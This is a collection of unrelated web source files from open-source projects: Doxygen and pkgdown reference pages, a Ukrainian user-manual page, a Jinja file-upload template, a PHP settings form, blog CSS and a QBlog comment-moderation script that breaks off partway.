var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
$(function() {
initMenu('',true,false,'search.php','Search');
$(document).ready(function() { init_search(); });
});
</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-attribs">Data Fields</a> </div>
<div class="headertitle">
<div class="title">qpic_t Struct Reference</div> </div>
</div><!--header-->
<div class="contents">
<p><code>#include <<a class="el" href="wad_8h_source.html">wad.h</a>></code></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-attribs"></a>
Data Fields</h2></td></tr>
<tr class="memitem:a2474a5474cbff19523a51eb1de01cda4"><td class="memItemLeft" align="right" valign="top"><a class="el" href="winquake_8h.html#adeb1ec2bfcab870d22eedfa8457a9d8f">int</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="structqpic__t.html#a2474a5474cbff19523a51eb1de01cda4">width</a></td></tr>
<tr class="separator:a2474a5474cbff19523a51eb1de01cda4"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ad12fc34ce789bce6c8a05d8a17138534"><td class="memItemLeft" align="right" valign="top"><a class="el" href="winquake_8h.html#adeb1ec2bfcab870d22eedfa8457a9d8f">int</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="structqpic__t.html#ad12fc34ce789bce6c8a05d8a17138534">height</a></td></tr>
<tr class="separator:ad12fc34ce789bce6c8a05d8a17138534"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aa4a1872efa27730abedfb29f671162c0"><td class="memItemLeft" align="right" valign="top"><a class="el" href="common_8h.html#a0c8186d9b9b7880309c27230bbb5e69d">byte</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="structqpic__t.html#aa4a1872efa27730abedfb29f671162c0">data</a> [4]</td></tr>
<tr class="separator:aa4a1872efa27730abedfb29f671162c0"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<h2 class="groupheader">Field Documentation</h2>
<a id="aa4a1872efa27730abedfb29f671162c0"></a>
<h2 class="memtitle"><span class="permalink"><a href="#aa4a1872efa27730abedfb29f671162c0">§ </a></span>data</h2>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="common_8h.html#a0c8186d9b9b7880309c27230bbb5e69d">byte</a> data[4]</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a id="ad12fc34ce789bce6c8a05d8a17138534"></a>
<h2 class="memtitle"><span class="permalink"><a href="#ad12fc34ce789bce6c8a05d8a17138534">§ </a></span>height</h2>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="winquake_8h.html#adeb1ec2bfcab870d22eedfa8457a9d8f">int</a> height</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a id="a2474a5474cbff19523a51eb1de01cda4"></a>
<h2 class="memtitle"><span class="permalink"><a href="#a2474a5474cbff19523a51eb1de01cda4">§ </a></span>width</h2>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="winquake_8h.html#adeb1ec2bfcab870d22eedfa8457a9d8f">int</a> width</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<hr/>The documentation for this struct was generated from the following file:<ul>
<li><a class="el" href="wad_8h_source.html">wad.h</a></li>
</ul>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.12
</small></address>
</body>
</html>
|
src/doc/Ukrainian/ch01s03.html | peterkomar/qfinances | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf8">
<title>3. Панель готівки</title>
<link rel="stylesheet" href="../images/book.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.73.2">
<link rel="start" href="index.html" title="Посібник користувача myFinances">
<link rel="up" href="ch01.html" title="Розділ 1. Робота із програмою">
<link rel="prev" href="ch01s02.html" title="2. Робота із фільтром операцій.">
<link rel="next" href="ch01s04.html" title="4. Панель боржників.">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<div class="navheader">
<table width="100%" summary="Navigation header">
<tr><th colspan="3" align="center">3. Панель готівки</th></tr>
<tr>
<td width="20%" align="left">
<a accesskey="p" href="ch01s02.html"><img src="../images/prev.png" alt="назад"></a> </td>
<th width="60%" align="center">Розділ 1. Робота із програмою</th>
<td width="20%" align="right"> <a accesskey="n" href="ch01s04.html"><img src="../images/next.png" alt="далі"></a>
</td>
</tr>
</table>
<hr>
</div>
<div class="section" lang="uk">
<div class="titlepage"><div><div><h3 class="title">
<a name="id2493267"></a>3. Панель готівки</h3></div></div></div>
<p>В панелі готівки відображається сума на рахунку, надходження та витрати на вибраний рік. Тут також міститься конвертер готівки. Тут також можна переглянути суму на рахунку у різних валютах.</p>
<div class="important" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Important">
<tr>
<td rowspan="2" align="center" valign="top" width="25"><img alt="[Важливо]" src="../images/important.png"></td>
<th align="left">Важливо</th>
</tr>
<tr><td align="left" valign="top">Конвертація валюти при перегляді на рахунку не відбуваються, для зміни валюти необхідно скористатись <span class="command"><strong>Preferences</strong></span>.</td></tr>
</table></div>
</div>
<div class="navfooter">
<hr>
<table width="100%" summary="Navigation footer">
<tr>
<td width="40%" align="left">
<a accesskey="p" href="ch01s02.html"><img src="../images/prev.png" alt="назад"></a> </td>
<td width="20%" align="center"><a accesskey="u" href="ch01.html"><img src="../images/up.png" alt="Догори"></a></td>
<td width="40%" align="right"> <a accesskey="n" href="ch01s04.html"><img src="../images/next.png" alt="далі"></a>
</td>
</tr>
<tr>
<td width="40%" align="left" valign="top">2. Робота із фільтром операцій. </td>
<td width="20%" align="center"><a accesskey="h" href="index.html"><img src="../images/home.png" alt="Початок"></a></td>
<td width="40%" align="right" valign="top"> 4. Панель боржників.</td>
</tr>
</table>
</div>
</body>
</html>
|
inspire/modules/deposit/templates/deposit/run.html | dset0x/inspire-next | {#
## This file is part of INSPIRE.
## Copyright (C) 2014 CERN.
##
## INSPIRE is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## INSPIRE is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with INSPIRE; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#}
{% extends "deposit/run_base.html" %}
{% set searchbar_enable=False %}
{%- block bundles %}
{% bundles "invenio.css", "base.js" %}
{%- endblock %}
{% block deposit_page %}
<div class="row">
{% block file_container %}
<div id="file_container" class="col-md-12 form-feedback-warning">
<div id="flash-message"></div>
{% include "deposit/form.html" %}
</div>
{% endblock %}
</div>
</div>
{% block modal_window %}
{% include "deposit/preview.html" %}
{% endblock modal_window %}
{% endblock deposit_page %}
{% block javascript %}
<script type="text/javascript">
require(["jquery", "js/deposit/form", "js/deposit/literature_submission_form", "js/deposit/plupload"], function($, deposit_form, LiteratureSubmissionForm) {
$(function() {
var save_url = '{{ url_for(".save", deposition_type=deposition_type, uuid=uuid, draft_id=draft.id) }}';
var save_all_url = '{{ url_for(".save", deposition_type=deposition_type, uuid=uuid, draft_id=draft.id, all='1') }}';
var complete_url = '{{ url_for(".save", deposition_type=deposition_type, uuid=uuid, draft_id=draft.id, submit='1') }}';
var autocomplete_url = '{{ url_for(".autocomplete", deposition_type=deposition_type, uuid=uuid, draft_id=draft.id, field_name="__FIELDNAME__") }}';
// Initialize form
deposit_form.attachTo("#submitForm", {
save_url: save_url,
save_all_url: save_all_url,
complete_url: complete_url,
autocomplete_url: autocomplete_url,
datepicker_element: '.datepicker',
datepicker_format: 'yy-mm-dd'
});
$('.pluploader').pluploadWidget({
max_file_size: '{{config.DEPOSIT_MAX_UPLOAD_SIZE|default('10mb')}}',
save_url: save_url,
url: '{{ url_for('.upload_file', deposition_type=deposition_type, uuid=uuid) }}',
delete_url: '{{ url_for('.delete_file', deposition_type=deposition_type, uuid=uuid) }}',
get_file_url: '{{ url_for('.get_file', deposition_type=deposition_type, uuid=uuid) }}',
dropbox_url: '{{ url_for('.upload_url', deposition_type=deposition_type, uuid=uuid) }}',
files: {{ form.files|safe }},
filters: {
mime_types : [
{ title : "PDF files", extensions : "pdf" },
],
max_file_size: "100mb",
prevent_duplicates: true
},
drop_element: "field-file_field",
unique_names : false,
autoupload: true
// Those are missing
// uuid:,
// newdep_url:,
// continue_url
});
var form = new LiteratureSubmissionForm(save_url);
});
});
</script>
{% endblock javascript %}
|
docs/reference/Wiki.html | Sage-Bionetworks/synapseclient | <!-- Generated by pkgdown: do not edit by hand -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Constructor for objects of type Wiki — Wiki • synapser</title>
<!-- jquery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<!-- Bootstrap -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.4.1/css/bootstrap.min.css" integrity="sha256-bZLfwXAP04zRMK2BjiO8iu9pf4FbLqX6zitd+tIvLhE=" crossorigin="anonymous" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.4.1/js/bootstrap.min.js" integrity="sha256-nuL8/2cJ5NDSSwnKD8VqreErSWHtnEP9E7AySL+1ev4=" crossorigin="anonymous"></script>
<!-- bootstrap-toc -->
<link rel="stylesheet" href="../bootstrap-toc.css">
<script src="../bootstrap-toc.js"></script>
<!-- Font Awesome icons -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/all.min.css" integrity="sha256-mmgLkCYLUQbXn0B1SRqzHar6dCnv9oZFPEC1g1cwlkk=" crossorigin="anonymous" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/v4-shims.min.css" integrity="sha256-wZjR52fzng1pJHwx4aV2AO3yyTOXrcDW7jBpJtTwVxw=" crossorigin="anonymous" />
<!-- clipboard.js -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.6/clipboard.min.js" integrity="sha256-inc5kl9MA1hkeYUt+EC3BhlIgyp/2jDIyBLS6k3UxPI=" crossorigin="anonymous"></script>
<!-- headroom.js -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/headroom/0.11.0/headroom.min.js" integrity="sha256-AsUX4SJE1+yuDu5+mAVzJbuYNPHj/WroHuZ8Ir/CkE0=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/headroom/0.11.0/jQuery.headroom.min.js" integrity="sha256-ZX/yNShbjqsohH1k95liqY9Gd8uOiE1S4vZc+9KQ1K4=" crossorigin="anonymous"></script>
<!-- pkgdown -->
<link href="../pkgdown.css" rel="stylesheet">
<script src="../pkgdown.js"></script>
<meta property="og:title" content="Constructor for objects of type Wiki — Wiki" />
<meta property="og:description" content="Represents a wiki page in Synapse with content specified in markdown." />
<!-- mathjax -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js" integrity="sha256-nvJJv9wWKEm88qvoQl9ekL2J+k/RWIsaSScxxlsrv8k=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/config/TeX-AMS-MML_HTMLorMML.js" integrity="sha256-84DKXVJXs0/F8OTMzX4UR909+jtl4G7SPypPavF+GfA=" crossorigin="anonymous"></script>
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body data-spy="scroll" data-target="#toc">
<div class="container template-reference-topic">
<header>
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<span class="navbar-brand">
<a class="navbar-link" href="../index.html">synapser</a>
<span class="version label label-default" data-toggle="tooltip" data-placement="bottom" title="Released version">0.11</span>
</span>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li>
<a href="../index.html">
<span class="fas fa-home fa-lg"></span>
</a>
</li>
<li>
<a href="../articles/synapser.html">Get started</a>
</li>
<li>
<a href="../reference/index.html">Reference</a>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">
Articles
<span class="caret"></span>
</a>
<ul class="dropdown-menu" role="menu">
<li>
<a href="../articles/docker.html">Docker</a>
</li>
<li>
<a href="../articles/manageSynapseCredentials.html">Manage Synapse Credentials</a>
</li>
<li>
<a href="../articles/systemDependencies.html">System Dependencies</a>
</li>
<li>
<a href="../articles/tables.html">Tables</a>
</li>
<li>
<a href="../articles/troubleshooting.html">Troubleshooting</a>
</li>
<li>
<a href="../articles/upload.html">File Upload</a>
</li>
<li>
<a href="../articles/views.html">Views</a>
</li>
</ul>
</li>
<li>
<a href="../news/index.html">Changelog</a>
</li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li>
<a href="https://github.com/Sage-Bionetworks/synapser/">
<span class="fab fa-github fa-lg"></span>
</a>
</li>
</ul>
</div><!--/.nav-collapse -->
</div><!--/.container -->
</div><!--/.navbar -->
</header>
<div class="row">
<div class="col-md-9 contents">
<div class="page-header">
<h1>Constructor for objects of type Wiki</h1>
<div class="hidden name"><code>Wiki.Rd</code></div>
</div>
<div class="ref-description">
<p>Represents a wiki page in Synapse with content specified in markdown.</p>
</div>
<pre class="usage"><span class='fu'>Wiki</span><span class='op'>(</span>title<span class='op'>=</span><span class='cn'>NULL</span>, owner<span class='op'>=</span><span class='cn'>NULL</span>, markdown<span class='op'>=</span><span class='cn'>NULL</span>, markdownFile<span class='op'>=</span><span class='cn'>NULL</span>, attachments<span class='op'>=</span><span class='cn'>NULL</span>, fileHandles<span class='op'>=</span><span class='cn'>NULL</span>, parentWikiId<span class='op'>=</span><span class='cn'>NULL</span><span class='op'>)</span></pre>
<h2 class="hasAnchor" id="arguments"><a class="anchor" href="#arguments"></a>Arguments</h2>
<table class="ref-arguments">
<colgroup><col class="name" /><col class="desc" /></colgroup>
<tr>
<th>title</th>
<td><p>optional named parameter: Title of the Wiki<br /></p></td>
</tr>
<tr>
<th>owner</th>
<td><p>optional named parameter: Parent entity or ID of the parent entity that the Wiki will belong to<br /></p></td>
</tr>
<tr>
<th>markdown</th>
<td><p>optional named parameter: Content of the Wiki (cannot be defined if markdownFile is defined)<br /></p></td>
</tr>
<tr>
<th>markdownFile</th>
<td><p>optional named parameter: Path to file which contains the Content of Wiki (cannot be defined if markdown is defined)<br /></p></td>
</tr>
<tr>
<th>attachments</th>
<td><p>optional named parameter: List of paths to files to attach<br /></p></td>
</tr>
<tr>
<th>fileHandles</th>
<td><p>optional named parameter: List of file handle IDs representing files to be attached<br /></p></td>
</tr>
<tr>
<th>parentWikiId</th>
<td><p>optional named parameter: (optional) For subpages, specify parent wiki page</p></td>
</tr>
</table>
<h2 class="hasAnchor" id="details"><a class="anchor" href="#details"></a>Details</h2>
<p><!-- % A detailed if possible precise description of the functionality provided, extending the basic information in the \description slot. --></p>
<h2 class="hasAnchor" id="value"><a class="anchor" href="#value"></a>Value</h2>
<p>An object of type Wiki</p>
<h2 class="hasAnchor" id="references"><a class="anchor" href="#references"></a>References</h2>
<p><!-- % A section with references to the literature. Use \url{} or \href{}{} for web pointers. --></p>
<h2 class="hasAnchor" id="note"><a class="anchor" href="#note"></a>Note</h2>
<p><!-- % Use this for a special note you want to have pointed out. --></p>
<h2 class="hasAnchor" id="see-also"><a class="anchor" href="#see-also"></a>See also</h2>
<div class='dont-index'><p><!-- % Pointers to related R objects, using \code{\link{...}} to refer to them. --></p></div>
<h2 class="hasAnchor" id="examples"><a class="anchor" href="#examples"></a>Examples</h2>
<pre class="examples"><div class='input'><span class='kw'>if</span> <span class='op'>(</span><span class='cn'>FALSE</span><span class='op'>)</span> <span class='op'>{</span>
<span class='co'># Create a Wiki</span>
<span class='va'>content</span> <span class='op'><-</span> <span class='st'>"
# My Wiki Page
Here is a description of my **fantastic** project!
"</span>
<span class='va'>wiki</span> <span class='op'><-</span> <span class='fu'>Wiki</span><span class='op'>(</span>owner <span class='op'>=</span> <span class='va'>project</span>,
title <span class='op'>=</span> <span class='st'>"My Wiki Page"</span>,
markdown <span class='op'>=</span> <span class='va'>content</span><span class='op'>)</span>
<span class='va'>wiki</span> <span class='op'><-</span> <span class='fu'><a href='synStore.html'>synStore</a></span><span class='op'>(</span><span class='va'>wiki</span><span class='op'>)</span>
<span class='co'># Update a Wiki</span>
<span class='va'>wiki</span> <span class='op'><-</span> <span class='fu'><a href='synGetWiki.html'>synGetWiki</a></span><span class='op'>(</span><span class='va'>project</span><span class='op'>)</span>
<span class='va'>wiki.markdown</span> <span class='op'><-</span> <span class='st'>"
# My Wiki Page
Here is a description of my **fantastic** project! Let's
*emphasize* the important stuff.
"</span>
<span class='va'>wiki</span> <span class='op'><-</span> <span class='fu'><a href='synStore.html'>synStore</a></span><span class='op'>(</span><span class='va'>wiki</span><span class='op'>)</span>
<span class='op'>}</span>
</div></pre>
</div>
<div class="col-md-3 hidden-xs hidden-sm" id="pkgdown-sidebar">
<nav id="toc" data-toggle="toc" class="sticky-top">
<h2 data-toc-skip>Contents</h2>
</nav>
</div>
</div>
<footer>
<div class="copyright">
<p>Developed by Bruce Hoff, Kimyen Ladia.</p>
</div>
<div class="pkgdown">
<p>Site built with <a href="https://pkgdown.r-lib.org/">pkgdown</a> 1.6.1.</p>
</div>
</footer>
</div>
</body>
</html>
|
api/2.0/classirc_1_1modestacker-members.html | inspircd-site-test/inspircd-site-test.github.io | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.13"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>InspIRCd: Member List</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">InspIRCd
 <span id="projectnumber">2.0</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.13 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
$(function() {
initMenu('',true,false,'search.php','Search');
$(document).ready(function() { init_search(); });
});
</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="namespaceirc.html">irc</a></li><li class="navelem"><a class="el" href="classirc_1_1modestacker.html">modestacker</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">irc::modestacker Member List</div> </div>
</div><!--header-->
<div class="contents">
<p>This is the complete list of members for <a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a>, including all inherited members.</p>
<table class="directory">
<tr class="even"><td class="entry"><a class="el" href="classirc_1_1modestacker.html#ab9db7e4fca784ea0162b613d04a6f078">GetStackedLine</a>(std::vector< std::string > &result, int max_line_size=360)</td><td class="entry"><a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classirc_1_1modestacker.html#a1149070bd69c381da4a25d1808828fb7">GetStackedLine</a>(std::deque< std::string > &result, int max_line_size=360)</td><td class="entry"><a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classirc_1_1modestacker.html#ac0ed4b7986656e2bf5ca1b8b4b6adce2">modestacker</a>(bool add)</td><td class="entry"><a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classirc_1_1modestacker.html#ab3a10ebd5ec2d0bc217c72e255f9c00d">Push</a>(char modeletter, const std::string &parameter)</td><td class="entry"><a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classirc_1_1modestacker.html#a4604ac5ec32af6da026dca5ef22e04fb">Push</a>(char modeletter)</td><td class="entry"><a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classirc_1_1modestacker.html#a79220984167dc7ca0855b2b24c33d6fc">PushMinus</a>()</td><td class="entry"><a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a></td><td class="entry"></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classirc_1_1modestacker.html#a1f2f3da1b94f013a43bc23afd87cf345">PushPlus</a>()</td><td class="entry"><a class="el" href="classirc_1_1modestacker.html">irc::modestacker</a></td><td class="entry"></td></tr>
</table></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.13
</small></address>
</body>
</html>
|
swfu/ctp/admin_settings.html | open-qhm/qhm | <?php
?>
<script type="text/javascript">
<!--
function showConfirm(){
var ans = window.confirm('登録してよろしいですか?');
if (ans) {
}
else {
return false;
}
}
//-->
</script>
<h2>SWFUの設定</h2>
<form action="admin_settings.php" method="post" enctype="multipart/form-data">
<?php
if ($errmsg != "") {
echo $errmsg;
}
?>
<table>
<?php
foreach ($settings as $item) {
$item_name = $item['name'];
echo '<tr>';
echo '<th style="width:25%;padding:4px;text-align:right;">'. $item['jname'].':</th>';
echo ' <td style="line-height:1.5em;">';
$value = isset($admin[$item_name]) ? $s->input_filter($admin[$item_name]) : '';
switch ($item_name) {
case 'overwrite':
for ($i = 0; $i < 2; $i++) {
$checked[$i] = ((int)$value == $i) ? ' checked="checked"' : '';
}
echo '<input type="radio" name="admin/'.$item_name.'" value="1"'.$checked[1].' />上書きする <input type="radio" name="admin/'.$item_name.'" value="0"'.$checked[0].' />上書きしない';
break;
case 'recent_page':
case 'recent_file':
echo '<input type="text" name="admin/'.$item_name.'" value="'.$value.'" style="ime-mode:inactive;" size="5" /> 件';
break;
case 'list_num':
echo '<input type="text" name="admin/'.$item_name.'" value="'.$value.'" style="ime-mode:inactive;" size="5" /> 行';
break;
case 'list_cols':
echo '<input type="text" name="admin/'.$item_name.'" value="'.$value.'" style="ime-mode:inactive;" size="5" /> 列';
break;
}
echo '</td></tr>';
}
?>
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="set" value="設 定" onclick="return showConfirm();" />
</td>
</tr>
</table>
</form>
<p><a href="admin_settings.php">管理者情報リストへ</a></p>
|
public/css/blog.css | toram/stuffs | /*
* Globals
*/
body {
font-family: Georgia, "Times New Roman", Times, serif;
color: #555;
}
h1, .h1,
h2, .h2,
h3, .h3,
h4, .h4,
h5, .h5,
h6, .h6 {
margin-top: 0;
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
font-weight: normal;
color: #333;
}
/*
* Override Bootstrap's default container.
*/
@media (min-width: 1200px) {
.container {
width: 970px;
}
}
/*
* Masthead for nav
*/
.blog-masthead {
background-color: #428bca;
-webkit-box-shadow: inset 0 -2px 5px rgba(0,0,0,.1);
box-shadow: inset 0 -2px 5px rgba(0,0,0,.1);
}
/* Nav links */
.blog-nav-item {
position: relative;
display: inline-block;
padding: 10px;
font-weight: 500;
color: #cdddeb;
}
.blog-nav-item:hover,
.blog-nav-item:focus {
color: #fff;
text-decoration: none;
}
/* Active state gets a caret at the bottom */
.blog-nav .active {
color: #fff;
}
.blog-nav .active:after {
position: absolute;
bottom: 0;
left: 50%;
width: 0;
height: 0;
margin-left: -5px;
vertical-align: middle;
content: " ";
border-right: 5px solid transparent;
border-bottom: 5px solid;
border-left: 5px solid transparent;
}
/*
* Blog name and description
*/
.blog-header {
padding-top: 20px;
padding-bottom: 20px;
}
.blog-title {
margin-top: 30px;
margin-bottom: 0;
font-size: 30px;
font-weight: normal;
}
.blog-description {
font-size: 20px;
color: #999;
}
/*
* Main column and sidebar layout
*/
.blog-main {
font-size: 18px;
line-height: 1.5;
}
/* Sidebar modules for boxing content */
.sidebar-module {
padding: 15px;
margin: 0 -15px 15px;
}
.sidebar-module-inset {
padding: 15px;
background-color: #f5f5f5;
border-radius: 4px;
}
.sidebar-module-inset p:last-child,
.sidebar-module-inset ul:last-child,
.sidebar-module-inset ol:last-child {
margin-bottom: 0;
}
/* Pagination */
.pager {
margin-bottom: 60px;
text-align: left;
}
.pager > li > a {
width: 140px;
padding: 10px 20px;
text-align: center;
border-radius: 30px;
}
/*
* Blog posts
*/
.blog-post {
margin-bottom: 60px;
}
.blog-post-title {
margin-bottom: 5px;
font-size: 40px;
}
.blog-post-meta {
margin-bottom: 20px;
color: #999;
}
/*
* Footer
*/
.blog-footer {
padding: 40px 0;
color: #999;
text-align: center;
background-color: #f9f9f9;
border-top: 1px solid #e5e5e5;
}
.blog-footer p:last-child {
margin-bottom: 0;
}
table tr th small {
font-size: 1.1rem;
}
.center {
text-align: center;
}
.grid{
margin-top: 10px;
margin-bottom: 10px;
} |
plugin/qblog/qblog_index_template.html | open-qhm/qhm | <?php
/**
* Template for QBlog settings toppage
* -------------------------------------------
* ./plugin/qblog/qblog_index_template.html
*
* Copyright (c) 2012 hokuken
* http://hokuken.com/
*
* created : 12/08/09
* modified :
*
*/
?>
<script type="text/javascript">
$(function(){
// !コメント
$("#qblog_comment_list").on("click", "input:button[name=accept]", function(){
var $$ = $(this), $tr = $(this).closest("tr");
var id = $tr.attr("id").split("_").pop();
var pagename = $("input:hidden[name=page]", $tr).val();
var action = "<?php echo h($script) ?>";
var data = {
mode : "accept",
refer : pagename,
plugin : "qblog_comment",
id : id,
accept : 1
};
$.post(action, data, function(res){
var $alert = $('<div></div>');
$alert.addClass("alert");
if (res == 1) {
$tr.remove();
$alert
.addClass("alert-success")
.html('コメントを承認しました。<br /><a>コメントを投稿したページに移動する。</a>')
.find("a").attr("href", action + '?' + encodeURIComponent(pagename));
//コメントが0件ならコメント管理を非表示に
if ($("#qblog_pending_comments tr.qblog-comment-item").length === 0) {
$("#qblog_pending_comments").remove();
}
}
else {
$alert
.addClass("alert-error")
.html('コメントを承認できませんでした。');
}
$alert.prepend('<button class="close" data-dismiss="alert">×</button>');
$("div.notifier").prepend($alert);
});
})
.on("click", "input:button[name=hide]", function(){
if ( !confirm("削除しますか?")) return false;
var $$ = $(this), $tr = $(this).closest("tr");
var id = $tr.attr("id").split("_").pop();
var pagename = $("input:hidden[name=page]", $tr).val();
var action = "<?php echo h($script) ?>";
var data = {
mode : "hide",
refer : pagename,
plugin : "qblog_comment",
id : id,
hide : 1
};
$.post(action, data, function(res){
var $alert = $('<div></div>');
$alert.addClass("alert");
if (res == 1) {
$tr.remove();
$alert
.addClass("alert-success")
.html('コメントを削除しました。<br /><a href="">コメントのページに移動する。</a>')
.find("a").attr("href", action + '?' + encodeURIComponent(pagename));
//コメントが0件ならコメント管理を非表示に
if ($("#qblog_pending_comments tr.qblog-comment-item").length === 0) {
$("#qblog_pending_comments").remove();
}
}
else {
$alert
.addClass("alert-error")
.html('コメントを削除できません。');
}
$alert.prepend('<button class="close" data-dismiss="alert">×</button>');
$("div.notifier").prepend($alert);
});
})
